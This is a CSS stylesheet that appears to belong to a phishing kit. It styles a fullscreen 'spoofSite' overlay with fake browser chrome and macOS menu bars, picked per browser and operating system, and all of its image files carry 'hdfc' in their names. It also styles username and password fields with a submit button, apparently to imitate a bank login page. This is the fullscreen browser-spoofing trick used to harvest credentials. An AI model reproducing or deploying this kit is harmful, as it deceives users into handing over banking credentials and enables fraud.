html.fullscreened {
  overflow-y: hidden;
  background-color: #fff;
}

.bg2{ background: #025296;
}
  
 
#spoofSite {
  background-color: #fff;
  left: 0;
  margin: 0 auto;
  overflow-y: scroll;
  position: fixed;
  width: 100%;
  z-index: 2;

  /* Updated in JS */
  top: 100px;
  height: 90vh !important;
}
.not-fullscreened #spoofSite { display: none; }


#spoofHeader {
  position: fixed;
  top: 0;
  left: 0;  
  width: 100%;
  z-index: 2;
  background: url(../img/head_gf.PNG);
}
.not-fullscreened #spoofHeader { display: none; }

#spoofMenu, #spoofBrowser { width: 100%; }


/* Menu (OS X only) */

.osx #spoofMenu { height: 22px; }
.windows #spoofMenu, .linux #spoofMenu { height: 0; }

.chrome.osx #spoofMenu {
  background: url(../img/menu-osx-chrome-left_hdfc.png) left top no-repeat, url(../img/menu-osx-right_hdfc.png) right top no-repeat, url(../img/menu-osx-bg_hdfc.png) left top repeat-x;
}

.firefox.osx #spoofMenu {
  background: url(../img/menu-osx-firefox-left_hdfc.png) left top no-repeat, url(../img/menu-osx-right_hdfc.png) right top no-repeat, url(../img/menu-osx-bg_hdfc.png) left top repeat-x;
}

.safari.osx #spoofMenu {
  background: url(../img/menu-osx-safari-left_hdfc.png) left top no-repeat, url(../img/menu-osx-right_hdfc.png) right top no-repeat, url(../img/menu-osx-bg_hdfc.png) left top repeat-x;
}

/* Browser UI */

.chrome.osx #spoofBrowser {
  background: url(../img/brow-osx-chrome_hdfc.png) left top no-repeat, url(../img/brow-osx-chrome2_hdfc.png) right top no-repeat;
  height: 72px;
}

.chrome.windows #spoofBrowser {
  background: url(../img/brow-windows-chrome_hdfc.png) left top no-repeat, url(../img/brow-windows-chrome2_hdfc.png) right top no-repeat;
  height: 85px;
  width:100%;
 
}

.chrome.linux #spoofBrowser {
  background: url(../img/brow-linux-chrome_hdfc.png) left top no-repeat, url(../img/brow-linux-chrome2_hdfc.png) right top no-repeat;
  height: 86px;
}

.firefox.osx #spoofBrowser {
  background: url(../img/brow-osx-firefox_hdfc.png) center top no-repeat, url(../img/brow-osx-firefox_hdfc.png) left top no-repeat;
  height: 87px;
}

.firefox.windows #spoofBrowser {
  background: url(../img/brow-osx-firefox_hdfc.PNG) left top no-repeat, url(../img/brow-osx-firefox2_hdfc.PNG) right top no-repeat;
  height: 63px;
}

.firefox.linux #spoofBrowser {
  background: url(../img/brow-linux-firefox_hdfc.png) left top no-repeat, url(../img/brow-linux-firefox2_hdfc.png) right top no-repeat;
  height: 90px;
}

.safari.osx #spoofBrowser {
  background: url(../img/brow-osx-safari_hdfc.png) center top no-repeat, url(../img/brow-osx-safari2_hdfc.png) left top no-repeat;
  height: 72px;
}

.safari.windows #spoofBrowser {
  background: url(../img/brow-windows-safari_hdfc.png) center top no-repeat, url(../img/brow-windows-safari2_hdfc.png) left top no-repeat;
  height: 72px;
}


/*edited */


.page_hdfc {
  background-color: white;
  color: black;
  border: 1px solid white;
  margin: 5px;
padding: 5px 10px; 
font-size:14px;
height:265px;
}

h3{margin-bottom:10px; margin-top:9px;}
input[type=password] {
    width: 44%;
    padding: 13px 7px;
    margin: 8px;
    float: right;
    height: 5px;
    box-sizing: border-box;
    border-radius: 3px;
    border: 1px solid #d6d5d5;
}
input[type=text] {
 width: 44%;
    padding: 13px 7px;
    margin: 8px;
    float: right;
    height: 5px;
    box-sizing: border-box;
    border-radius: 3px;
    border: 1px solid #d6d5d5;}
	
	label{float: left;
    width: 50%;     padding-top: 14px;
}
.terms_hdfc{border-bottom: 1px solid #e0dfdf;
    padding-bottom: 5px;
    margin-bottom: 12px;
	
	}
	.submit_hdfc{    float: right;
	width:100px;
    margin-top: 15px;
	color:white;
	
	background-image: linear-gradient(to bottom, #03346c, #063973, #093e7a, #0d4381, #104888);
}

.bg_hdfc{
	background-color:#f3f3f3;
}
.bg2_hdfc{background-color:#025296;}
#container-infy_hdfc{width:1200px; margin:auto;}
  .head_hdfc{width:100%;background-color:#3B536F;}
  .head2_hdfc{width:100%;background-color:white ;}
  .banner_hdfc{background:#F3F3F3; width:100%; display:inline-block;}
  .fullscreened_hdfc #container { display: none; }
  .center_hdfc{width:100%;background-color:#6DB1FF;}
  .center2_hdfc{width:100%;background-color:#234168;}
  .kowsick_hdfc{background-image:url(img/117.PNG);background-repeat: repeat;background-size:100% 100%;top:200px;height:100%; width:100%;}
	.kowsick1_hdfc{background:#F3F3F3; width:100%;}
	.kowsick2_hdfc{background:#F3F3F3; width:100%;}
	.kowsick3_hdfc{background:#F3F3F3; width:100%;}
	.kowsick4_hdfc{background:#025296; width:100%;}
	.kowsick5_hdfc{background:#025296; width:100%;}
  .bottom_hdfc{background:#F3F3F3; padding: 0% 5%;}